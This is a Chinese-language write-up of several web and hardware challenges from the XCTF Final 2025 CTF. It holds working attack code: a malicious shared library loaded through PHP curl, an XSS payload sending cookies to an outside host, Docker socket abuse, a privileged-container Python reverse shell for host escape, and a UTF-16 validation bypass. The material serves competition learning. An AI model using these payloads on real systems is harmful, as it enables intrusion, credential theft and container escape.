文章

XCTF final 2025 N1Star web wp

发表于 2025-10-28 更新于 2025-11- 14
作者 ENOCH
12~16 分钟 阅读

比赛时写的,比较简陋

kidding

参考文章curl任意库加载实现远程代码执行 (RCE)

根据文章打包so

#include <stdlib.h>
#include <stdio.h>

__attribute__((constructor)) static void rce_init(void)
{
    system("ls / > /tmp/1");
}

gcc -fPIC -shared -o [1.so](<http://1.so/>) 1.c

上传到靶机/tmp/1.so

执行php脚本

<?php
$malicious_so_path = '/tmp/1.so';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "<http://127.0.0.1>");
curl_setopt($ch, CURLOPT_SSLENGINE, $malicious_so_path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);

在/tmp/1读取到flag名称flag_141f80cc2-4400-45f0-9399-4900efb730f5

#include <stdlib.h>
#include <stdio.h>

__attribute__((constructor)) static void rce_init(void)
{
    system("cat /flag_141f80cc2-4400-45f0-9399-4900efb730f5 > /tmp/1");
}

读取flag

go-storage

这题复现会有玄学问题,例如XSS拿到admin之后登不上去等

Go 端用 os.CreateTemp(uploadDir, fileInfo.Filename),如果文件名里包含 *,随机串会替换第一个 *,保留后缀。 因此使用*.html 即可上传html让bot访问,通过XSS获取admin的cookie

提交URL为http://nginx-proxy/uploads/xxx.html

<html>
  <script>fetch("http://IP:PORT?c="+document.cookie)</script>
</html>

然后访问/admin端点,是一个使用superagent的任意url访问

但是superagent的node客服端支持向Unix域套接发送请求,同时docker挂载了docker.sock

使用http+unix://%2Fvar%2Frun%2Fdocker.sock/_ping 探活

然后POSThttp+unix://%2Fvar%2Frun%2Fdocker.sock/v1.43/containers/storage-service/exec

{
  "AttachStdout": true,
  "AttachStderr": true,
  "Cmd": ["/bin/sh","-lc","cp /flag.txt /app/src/uploads/flag.txt"]
}

会获取到一个ID

然后POSThttp+unix://%2Fvar%2Frun%2Fdocker.sock/v1.43/exec/<ID>/start 内容为

{ "Detach": false, "Tty": false }

接着直接访问/uploads/flag.txt即可

后续测试了一下,发现挂载docker.sock应该可以玩容器逃逸

POST http+unix://%2Fvar%2Frun%2Fdocker.sock/v1.43/containers/create 

{
  "Image": "chall-go-storage-bot",
  "Cmd": ["/bin/sh", "-c", "export RHOST=\"<HOST>\";export RPORT=<PORT>;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'"],
  "HostConfig": {
    "Privileged": true,
    "Binds": ["/:/host"]
  }
}

然后就会收到一个shell,在/host下挂载着宿主机的根目录。后续加个ssh密钥啥的。。。

赛场上想到了不过没试,估计有防御措施吧

wallet

echo -ne '\\xff\\xfe' > 1.json
printf '{"from":"admin","to":"aaa","amount":100000}' | iconv -f utf-8 -t utf-16le >> 1.json
curl -s http://173.32.6.116:3000/transfer \\
-H 'Content-Type: application/json; charset=utf-16le' \\
--data-binary @1.json

利用UTF16绕过不允许admin转账的检测,先把admin的钱全部转给自己

然后有浮点数精度问题,新建账号进行互转,每次50000

转十几次即可达到100000.01,拿到flag

STM32

__   __ _____  _______  ______            ____    _____  _____
\\ \\ / // ____||__   __||  ____|          / __ \\  / ____||  __ \\
 \\ V /| |        | |   | |__      \\ /   | |  | || (___  | |__) |
  > < | |        | |   |  __|      X    | |  | | \\___ \\ |  _  /
 / . \\| |____    | |   | |        / \\   | |__| | ____) || | \\ \\
/_/ \\_\\\\_____|   |_|   |_|               \\____/ |_____/ |_|  \\_\\

[*] Welcome to XCTF Final 2025 ~
[0] The Attachment at <https://github.com/xuanxuanblingbling/xctf_2025_final_rw_stm32>
[1] Tap Morse code "XCTF" at PC13 (active low) to get the first NFC M1 Card UID!
[2] Use CVE-2020-15808 or Glitch Attack to bypass STM32F103 RDP1, get the second NFC M1 Card UID at 0x0800F000 !

通过短接PC13到GNU,手搓摩斯码,写入CUID的UID区域

01 C8 21 F9 11

wp
wp
许可协议:  CC BY 4.0